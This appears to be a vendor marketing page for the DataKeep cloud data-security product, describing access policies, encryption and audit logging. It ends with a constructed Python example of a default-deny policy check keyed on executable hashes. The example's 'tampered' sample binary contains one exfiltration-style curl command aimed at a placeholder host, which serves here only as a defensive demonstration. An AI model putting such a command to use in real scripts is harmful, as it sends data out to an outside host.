Cloud Security Concerns
Constant news reports of data exposed on misconfigured public servers or in open S3 buckets leave many organizations wary of storing data in a public cloud. Although cloud service providers (CSPs) have invested heavily in security, the model remains one of shared responsibility: for IaaS, the CSP is responsible for security “of” the cloud (the underlying compute, storage and networking infrastructure), while the customer is responsible for security “in” the cloud (data protection, access control, monitoring and patching of the systems it deploys).
Even with the resources and business processes in place to manage cloud deployments, data security remains a key challenge. CSP administrators need access to the underlying servers and storage that host IaaS workloads in order to support daily operations, but it is the data owner’s responsibility to ensure that they, like any other unauthorized party, cannot read, use or modify critical data, whether accidentally or maliciously.
This responsibility grows with a multi-cloud strategy, where each CSP has its own security controls, processes and requirements. A single, data-centric solution that combines customer-defined access policies, encryption, key management and monitoring, both on-premises and across multiple clouds, can help an organization narrow its attack surface and keep operations running in the face of an attack.
How DataKeep™ from SecurityFirst helps with Cloud Security
Manage data access by role or group, including privileged access with zero trust
Manage data access by specific, approved applications including data backup apps
Encrypt data-at-rest and manage encryption keys separately from the data
Enforce access policies and encrypt data before migrating it to object storage
Audit data access requests / denials for encrypted personal data
Protect and Prevent with DataKeep
DataKeep uses customer-defined policies that govern who, what, when, where and how users access decrypted data. A policy can be as narrow as: a specific user can see a specific data set decrypted only when using a specific application, identified by the hash of its executable, on a specific server. Policies use role-based access control (RBAC) and privileged access management (PAM), and default to least privilege, so only those who need access to the data are granted it; access can also be restricted to specific approved applications.
DataKeep encrypts data at rest on servers at the volume or file level, on network file systems, and before data is sent to S3 object storage. It uses AES-256 encryption with built-in key management, certified as FIPS 140-2 compliant, so that keys are held and managed separately from the data they protect.
DataKeep logs every user data access request, approved or denied, in real time so that anomalies can be remediated promptly. Event logs can be forwarded to a Security Information and Event Management (SIEM) system for analysis and reporting.
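To make the who/what/where/how policy model and the audit trail described above concrete, here is an added example in Python. It is not DataKeep’s own code or policy language; the policy names, roles, hosts, datasets and the sample "binaries" are all constructed for the example. It shows a default-deny evaluator that matches a decrypt request on dataset, role, the SHA-256 of the requesting executable and the host, and writes each allow/deny decision as a JSON line of the kind a SIEM would ingest.

```python
import hashlib
import json
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List, Optional, Tuple

# Everything below is a constructed illustration, not DataKeep's policy format.


@dataclass(frozen=True)
class Policy:
    name: str
    dataset: str               # what: the protected data this rule covers
    roles: frozenset           # who: any of these roles may match (RBAC)
    app_sha256: Optional[str]  # how: SHA-256 of the approved executable; None = any app
    hosts: frozenset           # where: hosts on which decryption is allowed; empty = any


@dataclass(frozen=True)
class AccessRequest:
    user: str
    roles: frozenset
    dataset: str
    host: str
    exe_image: bytes           # bytes of the requesting process's executable


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def evaluate(policies: List[Policy], req: AccessRequest) -> Tuple[bool, str]:
    """Default deny: decryption is allowed only if some policy matches on dataset,
    role, application hash and host. A privileged role (e.g. a cloud admin) gets
    nothing unless a policy names it explicitly."""
    app_hash = sha256_hex(req.exe_image)
    for p in policies:
        if p.dataset != req.dataset:
            continue
        if not (p.roles & req.roles):
            continue
        if p.app_sha256 is not None and p.app_sha256 != app_hash:
            continue
        if p.hosts and req.host not in p.hosts:
            continue
        return True, f"matched policy {p.name}"
    return False, "no matching policy (default deny)"


AUDIT_LOG: List[str] = []   # JSON lines; a deployment would forward these to a SIEM


def request_decrypt(policies: List[Policy], req: AccessRequest, ts: Optional[str] = None) -> bool:
    """Evaluate the request and record the outcome, whether approved or denied."""
    allowed, reason = evaluate(policies, req)
    event = {
        "ts": ts or datetime.now(timezone.utc).isoformat(),
        "user": req.user, "roles": sorted(req.roles), "dataset": req.dataset,
        "host": req.host, "app_sha256": sha256_hex(req.exe_image),
        "decision": "allow" if allowed else "deny", "reason": reason,
    }
    AUDIT_LOG.append(json.dumps(event, sort_keys=True))
    return allowed


# Constructed sample executables: the approved backup agent and a tampered copy.
BACKUP_AGENT = b"#!/bin/sh\n# backup-agent 1.0 (constructed sample binary)\n"
TAMPERED_AGENT = BACKUP_AGENT + b"curl http://example.invalid/exfil\n"

POLICIES = [
    # Only the backup operator, running the exact approved agent, on one host.
    Policy("backup-pii", "customer-pii", frozenset({"backup-operator"}),
           sha256_hex(BACKUP_AGENT), frozenset({"db-prod-01"})),
    # Analysts may read reports with any application from any host.
    Policy("analyst-read", "sales-reports", frozenset({"analyst"}), None, frozenset()),
]


def demo() -> List[str]:
    """Five requests: approved backup, tampered agent, wrong host, privileged admin
    with no policy, and an analyst read that the looser policy permits."""
    op = frozenset({"backup-operator"})
    reqs = [
        AccessRequest("svc-backup", op, "customer-pii", "db-prod-01", BACKUP_AGENT),
        AccessRequest("svc-backup", op, "customer-pii", "db-prod-01", TAMPERED_AGENT),
        AccessRequest("svc-backup", op, "customer-pii", "db-prod-02", BACKUP_AGENT),
        AccessRequest("root", frozenset({"cloud-admin"}), "customer-pii", "db-prod-01", BACKUP_AGENT),
        AccessRequest("alice", frozenset({"analyst"}), "sales-reports", "laptop-17", TAMPERED_AGENT),
    ]
    return ["allow" if request_decrypt(POLICIES, r) else "deny" for r in reqs]


if __name__ == "__main__":
    print(demo())
    print("\n".join(AUDIT_LOG))
```

The hash check is what ties "which application" to something an attacker cannot spoof by renaming a binary: a tampered agent, or a different tool run by the same service account, produces a different digest and falls through to the default deny. Denied requests are logged with the same fields as approved ones, so the SIEM can alert on a privileged account repeatedly probing data it has no policy for.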